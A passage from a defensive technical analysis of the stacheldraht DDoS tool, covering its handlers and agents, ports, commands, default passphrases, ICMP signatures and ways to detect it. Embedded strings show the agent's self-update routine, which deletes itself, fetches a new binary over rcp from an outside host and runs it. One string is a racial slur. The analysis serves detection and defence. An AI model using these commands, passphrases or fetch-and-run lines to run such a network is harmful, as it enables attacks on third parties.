      agent, known as "stacheldraht", began to show up on systems in Europe
      and the United States.
      
      These attacks prompted CERT to release Incident Note 99-04:
      
              http://www.cert.org/incident_notes/IN-99-04.html
      
      Like trinoo, stacheldraht is made up of master (handler) and daemon,
      or "bcast" (agent) programs.  The handler/agent terminology was
      developed at the CERT Distributed System Intruder Tools workshop held
      in November 1999, and will be used in this analysis instead of the
      stacheldraht specific terms.  It is highly recommended that the
      CERT workshop report be read as well. See:
      
              http://www.cert.org/reports/dsit_workshop.pdf
      
      There is some competition to stacheldraht in the form of Mixter's new
      version of TFN -- Tribe Flood Network 2000, or TFN2K -- released on
      December 21, 1999.  For more on TFN2K, See:
      
              http://packetstorm.securify.com/distributed/
              http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
      
      Along with trinoo's handler/agent features, stacheldraht also shares
      TFN's features of distributed network denial of service by way of ICMP
      flood, SYN flood, UDP flood, and "Smurf" style attacks.  Unlike the
      original TFN and TFN2K, the analyzed stacheldraht code does not
      contain the "on demand" root shell bound to a TCP port (it may be
      based on earlier TFN code than was made public by Mixter in mid-1999).
      
      One of the weaknesses of TFN was that the attacker's connection to the
      master(s) that control the network was in clear-text form, and was
      subject to standard TCP attacks (session hijacking, RST sniping, etc.)
      Stacheldraht deals with this by adding an encrypting "telnet alike"
      (stacheldraht term) client.
      
      Stacheldraht agents were originally found in binary form on a number
      of Solaris 2.x systems, which were identified as having been
      compromised by exploitation of buffer overrun bugs in the RPC services
      "statd", "cmsd" and "ttdbserverd".  They have been witnessed "in the
      wild" as late as the writing of this analysis.
      
      After publishing analyses of trinoo and Tribe Flood Network on Bugtraq
      in December 1999, an incident investigator at another institution
      provided stacheldraht source code that was obtained from a file cache
      in a stolen account.  (I would like to thank this investigator, and
      also thank the folks at SecurityFocus for providing the open forum
      that allowed this to occur.)  This analysis was done using this
      captured source code (labelled version 1.1, with source file
      modification dates ranging from 8/15/1999 to 10/17/1999).
      
      The Makefiles contain rules for Linux and Solaris, with the default
      being Linux (even though it appears that the code does not work
      very reliably on Linux).  For the purposes of this analysis, all
      programs were compiled and run on Red Hat Linux 6.0 systems.  As far
      as I am aware, the agent has been witnessed "in the wild" only on
      Solaris 2.x systems.
      
      One thing that may not have been clearly stated in the analyses done
      on trinoo and Tribe Flood Network is that distributed denial of
      service attacks are two phase attacks, with "victims" and "attackers"
      that are defined depending on your point of view.
      
      There is an initial mass-intrusion phase, in which automated tools are
      used to remotely root compromise large numbers (i.e., in the several
      hundred to several thousand ranges) and the distributed denial of
      service agents are installed on these compromised systems.  These are
      primary victims (of system compromise.)  None of these distributed
      denial of service tools have any features that facilitate compromising
      systems, and these automated tools are held closely by those groups
      who wrote them.
      
      The mass-instrusion phase is followed by the actual denial of service
      attack phase, in which these compromised systems which constitute the
      handlers and agents of the distributed attack network are used to wage
      massive denial of service attacks against one or more sites.  These
      are secondary victims (of denial of service).
      
      [For an description of the methods used in the initial intrusion and
      network setup phases, see the analysis of the trinoo network,
      referenced in Appendix A.]
      
      Remember that modification of the source code can and would change any
      of the details of this analysis, such as prompts, passwords, commands,
      TCP/UDP port numbers, or supported attack methods, signatures, and
      features.
      
      
      The network: client(s)-->handler(s)-->agent(s)-->victim(s)
      ------------------------------------------------------------
      
      The stacheldraht network is made up of one or more handler programs
      ("mserv.c") and a large set of agents ("leaf/td.c").  The attacker uses
      an encrypting "telnet alike" program to connect to and communicate
      with the handlers ("telnetc/client.c").  A stacheldraht network would
      look like this:
      
                         +--------+             +--------+
                         | client |             | client |
                         +--------+             +--------+
                             |                      |
              . . . --+------+---------------+------+----------------+-- . . .
                      |                      |                       |
                      |                      |                       |
                +-----------+          +-----------+           +-----------+
                |  handler  |          |  handler  |           |  handler  |
                +-----------+          +-----------+           +-----------+
                      |                      |                       |
                      |                      |                       |
      . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
               |            |            |            |            |
               |            |            |            |            |
           +-------+    +-------+    +-------+    +-------+    +-------+
           | agent |    | agent |    | agent |    | agent |    | agent |
           +-------+    +-------+    +-------+    +-------+    +-------+
      
      
      The attacker(s) control one or more handlers using encrypting clients.
      Each handler can control many agents.  (There is an internal limit in
      the "mserv.c" code to 1000 agents. It is not know why 1000 was chosen,
      but the code does say that "1000 sockets are leet0.")  The agents are
      all instructed to coordinate a packet based attack against one or more
      victim systems by the handler (referred to as an "mserver" or "master
      server" in the code.)
      
      
      Communication
      -------------
      
          Client to handler(s):       16660/tcp
          Handler to/from agent(s):   65000/tcp, ICMP ECHO_REPLY
      
      Unlike trinoo, which uses UDP for communication between handlers and
      agents, or the original Tribe Flood Network, which uses ICMP for
      communication between the handler and agents, stacheldraht uses TCP
      and ICMP.
      
      Remote control of a stacheldraht network is accomplished using a
      simple client that uses symmetric key encryption for communication
      between itself and the handler.  The client accepts a single argument,
      the address of the handler to which it should connect.  It then
      connects using a TCP port (default 16660/tcp in the analyzed code).
      
      The attacker sees the following (if the proper password is given):
      
      ---------------------------------------------------------------------------
      # ./client 192.168.0.1
          [*] stacheldraht [*]
       (c) in 1999 by ...
      
      trying to connect...
      connection established.
      --------------------------------------
      enter the passphrase : sicken
      --------------------------------------
      entering interactive session.
      ******************************
         welcome to stacheldraht
      ******************************
      type .help if you are lame
      
      stacheldraht(status: a!1 d!0)>
      ---------------------------------------------------------------------------
      
      The prompt shows the number of agents that are believed to be active
      ("a!") and dead ("d!") at the time.  Using the command ".help" (let's
      assume, for the sake of argument, that we are lame) shows the
      supported command set:
      
      ---------------------------------------------------------------------------
      stacheldraht(status: a!1 d!0)>.help
      available commands in this version are:
      --------------------------------------------------
      .mtimer   .mudp     .micmp .msyn    .msort  .mping
      .madd     .mlist    .msadd .msrem   .distro .help
      .setusize .setisize .mdie  .sprange .mstop  .killall
      .showdead .showalive
      --------------------------------------------------
      stacheldraht(status: a!1 d!0)>
      ---------------------------------------------------------------------------
      
      
      Commands
      --------
      
      .distro user server
              Instructs the agent to install and run a new copy of itself
              using the Berkeley "rcp" command, on the system "server",
              using the account "user" (e.g., "rcp user@server:linux.bin ttymon")
      
      .help
              Prints a list of supported commands.
      
      .killall
              Kills all active agents.
      
      .madd ip1[:ip2[:ipN]]
              Add IP addresses to list of attack victims.
      
      .mdie
              Sends die request to all agents.
      
      .mdos
              Begins DoS attack.
      
      .micmp ip1[:ip2[:ipN]]
              Begin ICMP flood attack against specified hosts.
      
      .mlist
              List IP addresses of hosts being DoS attacked at the moment.
      
      .mping
              Pings all agents (bcasts) to see if they are alive.
      
      .msadd
              Adds a new master server (handler) to the list of available
              servers.
      
      .msort
              Sort out dead/alive agents (bcasts). (Sends pings and
              shows counts/percentage of dead/alive agents).
      
      .mstop ip1[:ip2[:ipN]]
      .mstop all
              Stop attacking specific IP addresses, or all.
      
      .msrem
              Removes a master server (handler) from the list of available
              servers.
      
      .msyn ip1[:ip2[:ipN]]
              Begin SYN flood attack against specified hosts.
      
      .mtimer seconds
              Set timer for attack duration. (No checks on this value.)
      
      .mudp ip1[:ip2[:ipN]]
              Begin UDP flood attack against specified hosts.
              (Trinoo DoS emulation mode.)
      
      .setisize
              Sets size of ICMP packets for flooding. (max:1024,
              default:1024).
      
      .setusize
              Sets size of UDP packets for flooding (max:1024,
              default:1024).
      
      .showalive
              Shows all "alive" agents (bcasts).
      
      .showdead
              Shows all "dead" agents (bcasts).
      
      .sprange lowport-highport
              Sets the range of ports for SYN flooding (defaults to
              lowport:0, highport:140).
      
      
      Password protection
      -------------------
      
      After connecting to the handler using the client program, the attacker
      is prompted for a password.  This password (default "sicken" in the
      analyzed code) is a standard crypt() encrypted password, which is then
      Blowfish encrypted using the passphrase "authentication" before being
      sent over the network to the handler (*all* communication between
      the agent and handler is Blowfish encrypted with this passphrase.)
      
      Like TFN, C macros ("config.h") define values used for expressing
      commands, replacement argument vectors ("HIDEME" and "HIDEKIDS")
      to conceal program names, etc.:
      
      ---------------------------------------------------------------------------
      #ifndef _CONFIG_H
      
      /* user defined values for the teletubby flood network */
      
      #define HIDEME "(kswapd)"
      #define HIDEKIDS "httpd"
      #define CHILDS 10
      
      /* These are like passwords, you might want to change them */
      
      #define ID_SHELL   1    /* to bind a rootshell */
      
      #define ID_ADDR  699     /* ip add request for the flood server */
      
      #define  ID_SETPRANGE 2007 /* set port range for synflood */
      #define   ID_SETUSIZE 2006 /* set udp size */
      #define   ID_SETISIZE 2005 /* set icmp size */
      #define    ID_TIMESET 2004 /* set the flood time */
      #define     ID_DIEREQ 2003 /* shutdown request of the masterserver */
      #define   ID_DISTROIT 2002 /* distro request of the master server */
      #define ID_REMMSERVER 2001 /* remove added masterserver */
      #define ID_ADDMSERVER 2000 /* add new masterserver request */
      #define SPOOF_REPLY 1000   /* spoof test reply of the master server
      #define ID_TEST  668       /* test of the master server */
      #define ID_ICMP  1055      /* to icmp flood */
      #define ID_SENDUDP 2       /* to udp flood */
      #define ID_SENDSYN 3       /* to syn flood */
      #define ID_SYNPORT 4       /* to set port */
      #define ID_STOPIT  5       /* to stop flooding */
      #define ID_SWITCH  6       /* to switch spoofing mode */
      #define ID_ACK     7       /* for replies to the client */
      
      #define _CONFIG_H
      #endif
      ---------------------------------------------------------------------------
      
      As you can see, it is recommended that these be changed to prevent
      someone stumbling across the agents from knowing what values are
      used, thereby allowing them to execute agent commands.
      
      
      Fingerprints
      ------------
      
      As with trinoo and Tribe Flood Network, the methods used to install
      the handler/agent will be the same as installing any program on a
      compromised Unix system, with all the standard options for concealing
      the programs and files (e.g., use of hidden directories, "root kits",
      kernel modules, etc.)
      
      One feature of stacheldraht not shared by trinoo or TFN is the ability
      to upgrade the agents on demand.  This feature employs the Berkeley
      "rcp" command (514/tcp), using a stolen account at some site as a
      cache.  On demand, all agents are instructed to delete the current
      program image, go out and get a new copy (either Linux- or
      Solaris-specific binary) from a site/account using "rcp", start running
      this new image with "nohup", and then exit.
      
      As for identifying the programs in the file system, there are
      (provided they are not edited out) some discernible strings.
      
      Strings embedded in the encrypting client ("client") include the
      following:
      
      ------------------------------------------------------------------------------
       . . .
      connection closed.
      usage: ./sclient <ip/host>
          [*] stacheldraht [*]
       (c) in 1999 by ...
      trying to connect...
      unable to resolv %s
      unable to connect.
      connection established.
      --------------------------------------
      enter the passphrase :
      authentication
      failed
      authentication failed.
      entering interactive session.
      ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
      huhu
       . . .
      ------------------------------------------------------------------------------
      
      Strings embedded in the handler ("mserv") include the following:
      
      ------------------------------------------------------------------------------
       . . .
      %d.%d.%d.%d
      jbQ4yQaKLbFZc
      * mtimer reached *
      .quit
      exiting...
      you need to stop the packet action first.
      .help
      .version
      [*]stacheldraht[*] mserver version: 1.1
      setusize
      setisize
      mdos
      mping
      mudp
      micmp
      msyn
      mstop
      mtimer
      madd
      mlist
      msort
      msadd
      msrem
      distro
      sprange
      killall
      showdead
      showalive
      add some bcasts mofo.
      killing all active childs...
      usage: .sprange <lowport-highport>
      example: .sprange 0-140
       low port is : %i
      high port is : %i
      request was sent to the network.
      usage: .setusize <udp packet size (<=1024)>
      current udp packet size is %ibytes
      udp packet size was set to %i bytes.
      udp packet size is too large.
      usage: .setisize <icmp packet size (<=1024)>
      current icmp packet size is %ibytes
      icmp packet size was set to %i bytes.
      icmp packet size is too large.
      sending mass die request...
      finished.
      .mudp
      starting trinoo emulation...
      removing useful commands.
      - DONE -
      available commands in this version are:
      --------------------------------------------------
      .mtimer   .mudp     .micmp .msyn    .msort  .mping
      .madd     .mlist    .msadd .msrem   .distro .help
      .setusize .setisize .mdie  .sprange .mstop  .killall
      .showdead .showalive
      usage: .distro <user> <server that runs rcp>
      remember  : the distro files need to be executable!
      that means: chmod +x linux.bin , chmod +x sol.bin ;))
      sending distro request to all bcasts....
            user : %s
      rcp server :
      unable to resolve - %s
      unable to send distro request.
      request was sent, wait some minutes ;)
      usage: .msrem <masterserver>
      removing masterserver -
      failed.
      usage: .msadd <masterserver>
      adding masterserver -
      no packet action at the moment, sir.
      the followings ip(s) are getting packeted...
      --------------------------------------------
      [*] stacheldraht [*] is packeting %d ips
      [*] stacheldraht [*] is packeting 1 ip
      .mstop all
      deleting from packetlist...
      %s - removed.
      %s - skipped.
      restarting packeting routines...
      niggahbitch
      usage: .madd <ip1:ip2:ip3:ip4>
      adding to packetlist...
      %s - added.
      usage: .mtimer <seconds to packet>
      packet timer was set to %d seconds
      usage: .mstop <all> or <ip1:ip2:ip3:ip4:ip5 etc..>
      packeting stopped.
      usage: .msyn <ip1:ip2:ip3:ip4:ip5 etc..>
      the net is already packeting.
      mass syn flooding
      %i floodrequests were sent to %i bcasts.
      usage: .micmp <ip1:ip2:ip3:ip4:ip5 etc..>
      mass icmp bombing
      usage: .mudp <ip1:ip2:ip3:ip4:ip5 etc..>
      mass udp bombing
      tR1n00(status: a!%i d!%i)>
      stacheldraht(status: a!%i d!%i)>
      waiting for ping replies...
      total bcasts : %d   - 100%
      alive bcasts : 0   - 0%
      alive bcasts : %d   -  %d%
      dead bcasts  : %d   - %d%
      showing the alive bcasts...
      ---------------------------
      alive bcasts: %i
      showing the dead bcasts...
      --------------------------
      dead bcasts: %i
      sorting out all the dead bcasts
      -------------------------------
      %d dead bcasts were sorted out.
      bcasts
      [*]-stacheldraht-[*] - forking in the background...
      %i bcasts were successfully read in.
      3.3.3.3
      spoofworks
      ficken
      authentication
      failed
      ******************************
         welcome to stacheldraht
      type .help if you are lame
      ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
      huhu
      [0;35mTribe Flood Network (c) 1999 by
      [5mMixter
       . . .
      ------------------------------------------------------------------------------
      
      Strings embedded in the agent ("td") include the following:
      
      ------------------------------------------------------------------------------
       . . .
      %d.%d.%d.%d
      ICMP
      Error sending syn packet.
      tc: unknown host
      3.3.3.3
      mservers
      randomsucks
      skillz
      ttymon
      rm -rf %s
      rcp %s@%s:linux.bin %s
      nohup ./%s
      1.1.1.1
      127.0.0.1
      lpsched
      no masterserver config found.
      using default ones.
      available servers: %i - working servers : 0
      [*] stacheldraht [*] installation failed.
      found a working [*] stacheldraht [*] masterserver.
      masterserver is gone, looking for a new one
      sicken
      in.telne
      ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
       . . .
      ------------------------------------------------------------------------------
      
      When each agent starts up, it attempts to read a master server
      configuration file to learn which handler(s) may control it.  This
      file is a list of IP addresses, encrypted using Blowfish, with
      a passphrase of "randomsucks". Failing to find a configuration file,
      there are one or more default handler IP addresses compiled into the
      program (shown above as "1.1.1.1" and "127.0.0.1" - these will
      obviously be changed).
      
      Once the agent has determined a list of potential handlers, it then
      starts at the beginning of the list of handlers and sends an ICMP
      ECHO_REPLY packet with an ID field containing the value 666 and data
      field containing the string "skillz".  If the master gets this packet,
      it sends back an ECHO_REPLY packet with an ID field containing the
      value 667 and data field containing the string "ficken".  (It should
      be noted that there appears to be a bug that makes the handler and
      agent send out some large, e.g., >1000 byte, packets.  The handler and
      agent continue periodically sending these 666|skillz / 667|ficken
      packets back and forth.  This would be one way of detecting agents/masters
      by passively monitoring these ICMP packets.)
      
      Seen with "sniffit" (modified per patches in the TFN analysis),
      these packets look like this:
      
      ------------------------------------------------------------------------------
      ICMP message id: 10.0.0.1 > 192.168.0.1
        ICMP type: Echo reply
       45 E 00 . 04 . 14 . 01 . 0F . 00 . 00 . 40 @ 01 . E9 . 53 S 0A . 00 . 00 . 01 .
       C0 . A6 . 00 . 01 . 00 . 00 . B4 . 13 . 02 . 9A . 00 . 00 . 00 . 00 . 00 . 00 .
       00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       73 s 6B k 69 i 6C l 6C l 7A z 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       . . . [60 lines of zeros deleted]
       00 . 00 . 00 . 00 .
      
      ICMP message id: 192.168.0.1 > 10.0.0.1
        ICMP type: Echo reply
       45 E 00 . 04 . 14 . 04 . F8 . 00 . 00 . 40 @ 01 . E5 . 6A j C0 . A6 . 00 . 01 .
       0A . 00 . 00 . 01 . 00 . 00 . CE . 21 ! 02 . 9B . 00 . 00 . 00 . 00 . 00 . 00 .
       00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       66 f 69 i 63 c 6B k 65 e 6E n 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       . . . [60 lines of zeros deleted]
       00 . 00 . 00 . 00 .
      ------------------------------------------------------------------------------
      
      In addition to finding an active handler, the agent performs a test
      to see if the network on which the agent is running allows packets to
      exit with forged source addresses.  It does this by sending out an
      ICMP ECHO_REPLY packet with a forged IP address of "3.3.3.3", an ID of
      666, and the IP address of the agent system (obtained by getting the
      hostname, then resolving this to an IP address) in the data field of
      the ICMP packet.  (Note that it also sets the Type of Service field to
      7 on this particular packet, while others have a ToS value of 0.)
      
      If the master receives this packet, it replies to the IP address
      embedded in the packet with an ECHO_REPLY packet containing an ID of
      1000 and the word "spoofworks" in the data field.  If the agent
      receives this packet, it sets a spoof_level of 0 (can spoof all 32
      bits of IP address).  If it times out before receiving a spoof reply
      packet, it sets a spoof_level of 3 (can only spoof the final octet).
      
      These packets (as seen by tcpdump and tcpshow) are shown here:
      
      ------------------------------------------------------------------------------
      # tcpdump icmp
       . . .
      14:15:35.151061 3.3.3.3 > 192.168.0.1: icmp: echo request [tos 0x7]
      14:15:35.177216 192.168.0.1 > 10.0.0.1: icmp: echo reply
       . . .
      
      # tcpdump -lenx icmp | tcpshow -cooked
       . . .
      -----------------------------------------------------------------
      Packet 5
              Timestamp:                      14:08:04.171310
              Source Ethernet Address:        00:10:1B:2B:3B:85
              Destination Ethernet Address:   00:00:F0:00:69:78
              Encapsulated Protocol:          IP
      IP Header
              Version:                        4
              Header Length:                  20 bytes
              Service Type:                   0x07
              Datagram Length:                112 bytes
              Identification:                 0x021C
              Flags:                          MF=off, DF=off
              Fragment Offset:                0
              TTL:                            255
              Encapsulated Protocol:          ICMP
              Header Checksum:                0x8408
              Source IP Address:              3.3.3.3
              Destination IP Address:         192.168.0.1
      ICMP Header
              Type:                           echo-request
              Checksum:                       0xF7FF
              Id:                             0x0000
              Sequence:                       0x0000
      ICMP Data
              ....................10.0.0.1.........................................
      .........
              <*** Rest of data missing from packet dump ***>
      
      Packet 7
              Timestamp:                      14:08:04.197954
              Source Ethernet Address:        00:00:C0:B6:84:E4
              Destination Ethernet Address:   00:00:F0:00:69:78
              Encapsulated Protocol:          IP
      IP Header
              Version:                        4
              Header Length:                  20 bytes
              Service Type:                   0x00
              Datagram Length:                1044 bytes
              Identification:                 0x198F
              Flags:                          MF=off, DF=off
              Fragment Offset:                0
              TTL:                            64
              Encapsulated Protocol:          ICMP
              Header Checksum:                0x3022
              Source IP Address:              192.168.0.1
              Destination IP Address:         10.0.0.1
      ICMP Header
              Type:                           echo-reply
              Checksum:                       0xD7DA
              Id:                             0x03E8
              Sequence:                       0x0000
      ICMP Data
              ....................spoofworks......................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ....................................
              <*** Rest of data missing from packet dump ***>
      ------------------------------------------------------------------------------
      
      There is also a code to perform an ID test, sending an ICMP ECHO_REPLY
      packet with an ID field value of 669, and the string "sicken\n" in the
      data field.  This code is triggered if the handler is sent an ICMP
      ECHO_REPLY packet with an ID field containing the value 668.  The
      program "gag" (see Appendix A) will allow you to probe for
      stacheldraht agents, which will show up like this (tcpdump and tcpshow
      as modified per patches in Appendix C):
      
      ------------------------------------------------------------------------------
      Packet 1
              Timestamp:                      16:27:51.294727
              Source Ethernet Address:        00:00:C0:B6:84:E4
              Destination Ethernet Address:   00:00:F0:00:69:78
              Encapsulated Protocol:          IP
      IP Header
              Version:                        4
              Header Length:                  20 bytes
              Service Type:                   0x10
              Datagram Length:                40 bytes
              Identification:                 0x3558 (13656)
              Flags:                          MF=off, DF=on
              Fragment Offset:                0
              TTL:                            64
              Encapsulated Protocol:          ICMP
              Header Checksum:                0xA644
              Source IP Address:              10.0.0.2
              Destination IP Address:         198.168.0.1
      ICMP Header
              Type:                           echo-reply
              Checksum:                       0xC61F
              Id:                             0x029C (668)
              Sequence:                       0x0000 (0)
      ICMP Data
              gesundheit!....
      -----------------------------------------------------------------
      Packet 2
              Timestamp:                      16:27:51.340321
              Source Ethernet Address:        00:10:1B:2B:3B:85
              Destination Ethernet Address:   00:00:F0:00:69:78
              Encapsulated Protocol:          IP
      IP Header
              Version:                        4
              Header Length:                  20 bytes
              Service Type:                   0x00
              Datagram Length:                1044 bytes
              Identification:                 0x1D13 (7443)
              Flags:                          MF=off, DF=off
              Fragment Offset:                0
              TTL:                            64
              Encapsulated Protocol:          ICMP
              Header Checksum:                0xFAA7
              Source IP Address:              192.168.0.1
              Destination IP Address:         10.0.0.2
      ICMP Header
              Type:                           echo-reply
              Checksum:                       0xB71F
              Id:                             0x029D (669)
              Sequence:                       0x0000 (0)
      ICMP Data
              ....................sicken
              ..................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ...................................
              <*** Rest of data missing from packet dump ***>
      ------------------------------------------------------------------------------
      
      The script "gag" would be used like this.  First, build a list of all
      suspect systems (e.g., do an "nmap" OS detection scan and find all
      Solaris and Linux systems on your network, or just scan the entire
      network and find all active IP addresses).  Start "tcpdump" to capture
      all the potential replies for later use.  Then start "gag", passing it
      this list of IP addresses to check.
      
      ------------------------------------------------------------------------------
      # tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669'
      # ./gag -v iplist
      sending packet [668/"gesundheit!"] to 192.168.0.1
      sending packet [668/"gesundheit!"] to 192.168.0.30
      sending packet [668/"gesundheit!"] to 192.168.1.2
      sending packet [668/"gesundheit!"] to 192.168.1.5
      sending packet [668/"gesundheit!"] to 192.168.2.10
      sending packet [668/"gesundheit!"] to 192.168.3.6
       . . .
      ------------------------------------------------------------------------------
      
      To see the list of systems that returned ICMP ECHO_REPLY packets with
      ID 669, do the following:
      
      ------------------------------------------------------------------------------
      # tcpdump -r stach.dump
      tcpdump: Filtering in user process
      15:27:57.520094 192.168.0.1 > 10.0.0.1: icmp: echo reply (DF)
      15:28:01.984660 192.168.2.10 > 10.0.0.1: icmp: echo reply (DF)
      ------------------------------------------------------------------------------
      
      To actually see the packet contents to confirm "sicken\n" is included,
      you can do the following:
      
      ------------------------------------------------------------------------------
      # tcpshow < stach.dump | egrep "Source IP|sicken"
      tcpdump: Filtering in user process
              Source IP Address:              198.162.0.1
              ....................sicken
              Source IP Address:              192.168.2.10
              ....................sicken
      ------------------------------------------------------------------------------
      
      [There are more elegant ways of doing this, like writing a robust and
      feature filled C program with libnet (see Appendix B for reference),
      but there wasn't enough time before Y2K eve to get elegant.  What the
      heck.  Dirty works fine for me. I found three agents when I ran it
      "live."]
      
      The strings "skillz", "spoofworks", "sicken", "niggahbitch", and
      "ficken" -- all sent in ICMP data segments -- are not encrypted, so
      are visible in the data portion of ICMP ECHO_REPLY packets.  The ID
      values 666, 667, 668, 669, and 1000 would also be identifiable in the
      packet flow using the above methods.
      
      The stacheldraht handler, which forks to handle commands and listen
      for ICMP packets, is seen on the system with "lsof" like this:
      
      ------------------------------------------------------------------------------
      # lsof -c mserv
      COMMAND  PID USER   FD   TYPE DEVICE    SIZE  NODE NAME
      mserv   1072 root  cwd    DIR    3,3    2048 40961 /tmp/...
      mserv   1072 root  rtd    DIR    3,3    1024     2 /
      mserv   1072 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
      mserv   1072 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
      mserv   1072 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
      mserv   1072 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
      mserv   1072 root    0u   CHR  136,4             6 /dev/pts/4
      mserv   1072 root    1u   CHR  136,4             6 /dev/pts/4
      mserv   1072 root    2u   CHR  136,4             6 /dev/pts/4
      mserv   1072 root    3u  sock    0,0          2143 can't identify protocol
      mserv   1073 root  cwd    DIR    3,3    2048 40961 /tmp/...
      mserv   1073 root  rtd    DIR    3,3    1024     2 /
      mserv   1073 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
      mserv   1073 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
      mserv   1073 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
      mserv   1073 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
      mserv   1073 root    0u   CHR  136,4             6 /dev/pts/4
      mserv   1073 root    1u   CHR  136,4             6 /dev/pts/4
      mserv   1073 root    2u   CHR  136,4             6 /dev/pts/4
      mserv   1073 root    3u  inet   2144           TCP *:16660 (LISTEN)
      mserv   1088 root  cwd    DIR    3,3    2048 40961 /tmp/...
      mserv   1088 root  rtd    DIR    3,3    1024     2 /
      mserv   1088 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
      mserv   1088 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
      mserv   1088 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
      mserv   1088 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
      mserv   1088 root    0u   CHR  136,4             6 /dev/pts/4
      mserv   1088 root    1u   CHR  136,4             6 /dev/pts/4
      mserv   1088 root    2u   CHR  136,4             6 /dev/pts/4
      mserv   1088 root    3r  FIFO    0,0          2227 pipe
      mserv   1088 root    5w  FIFO    0,0          2227 pipe
      mserv   1091 root  cwd    DIR    3,3    2048 40961 /tmp/...
      mserv   1091 root  rtd    DIR    3,3    1024     2 /
      mserv   1091 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
      mserv   1091 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
      mserv   1091 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
      mserv   1091 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
      mserv   1091 root    0u   CHR  136,4             6 /dev/pts/4
      mserv   1091 root    1u   CHR  136,4             6 /dev/pts/4
      mserv   1091 root    2u   CHR  136,4             6 /dev/pts/4
      mserv   1091 root    3r  FIFO    0,0          2240 pipe
      mserv   1091 root    4u  inet   2215           TCP
      192.168.0.1:16660->10.0.0.1:1029 (ESTABLISHED)
      mserv   1091 root    5w  FIFO    0,0          2240 pipe
      ------------------------------------------------------------------------------
      
      The agent, which also forks when in use, looks like this:
      
      ------------------------------------------------------------------------------
      # lsof -c ttymon
      COMMAND PID USER   FD   TYPE DEVICE    SIZE  NODE NAME
      ttymon  437 root  cwd    DIR    3,1    1024 37208 /usr/lib/libx/...
      ttymon  437 root  rtd    DIR    3,1    1024     2 /
      ttymon  437 root  txt    REG    3,1  324436 37112 /usr/lib/libx/.../ttymon
      ttymon  437 root  mem    REG    3,1  243964 29140 /lib/libnss_files-2.1.1.so
      ttymon  437 root  mem    REG    3,1 4016683 29115 /lib/libc-2.1.1.so
      ttymon  437 root  mem    REG    3,1  342206 28976 /lib/ld-2.1.1.so
      ttymon  437 root    3u  sock    0,0           779 can't identify protocol
      ttymon  449 root  cwd    DIR    3,1    1024 37208 /usr/lib/libx/...
      ttymon  449 root  rtd    DIR    3,1    1024     2 /
      ttymon  449 root  txt    REG    3,1  324436 37112 /usr/lib/libx/.../ttymon
      ttymon  449 root    0u  inet    811           TCP *:32222 (LISTEN)
      ttymon  449 root    3u  sock    0,0           779 can't identify protocol
      ------------------------------------------------------------------------------
      
      
      Defenses
      --------
      
      Because the programs use ICMP_ECHOREPLY packets for communication,
      it will be very difficult (if not impossible) to block it without
      breaking most Internet programs that rely on ICMP.  The Phrack
      paper on LOKI states:
      
              The only sure way to destroy this channel is to deny ALL
              ICMP_ECHO traffic into your network.
      
      Short of rejecting this traffic, it will instead be necessary to observe
      the difference between "normal" use of ICMP_ECHO and ICMP_ECHOREPLY
      packets by programs like "ping".  This will not be an easy task,
      especially on large networks.  (See the LOKI paper for more details.)
      
      The real defense is to make sure that *all* systems are kept up to
      date with security patches, unnecessary services are turned off,
      and competent system administrators are running and monitoring
      every Unix system on your network.  (I'll hold my breath while you
      go make that happen, OK? ;)
      
      
      Weaknesses
      ----------
      
      If the source has not been modified, you can identify stacheldraht
      clients/handlers/agents by the embedded strings shown earlier.
      
      The .distro command uses the Berkeley "rcp" command for obtaining
      updated copies of the agent.  Monitoring "rcp" connections (514/tcp)
      from multiple systems on your network, in quick succession, to a
      single IP address outside your network would be a good trigger. (Note
      that the use of "rcp" in a this form requires an anonymous trust
      relationship, usually in the form of "+ +" in a user's ~/.rhosts file,
      which also will allow you to immediately archive the contents of this
      account while contacting the owners to preserve evidence.)
      
      The IP spoof test uses a constant source address of "3.3.3.3".  Watch
      for this to show up in the source address of outgoing unsolicited
      ICMP_ECHOREPLY packets.  (If you do RFC 2267 style egress filtering,
      you will have to watch for these packets from somewhere inside your
      border routers, or on each subnet. Ethernet switches will make this
      more difficult to do on local subnets, so an intrusion detection
      system (IDS) just inside your borders would be the best way to do
      this for your entire network.)
      
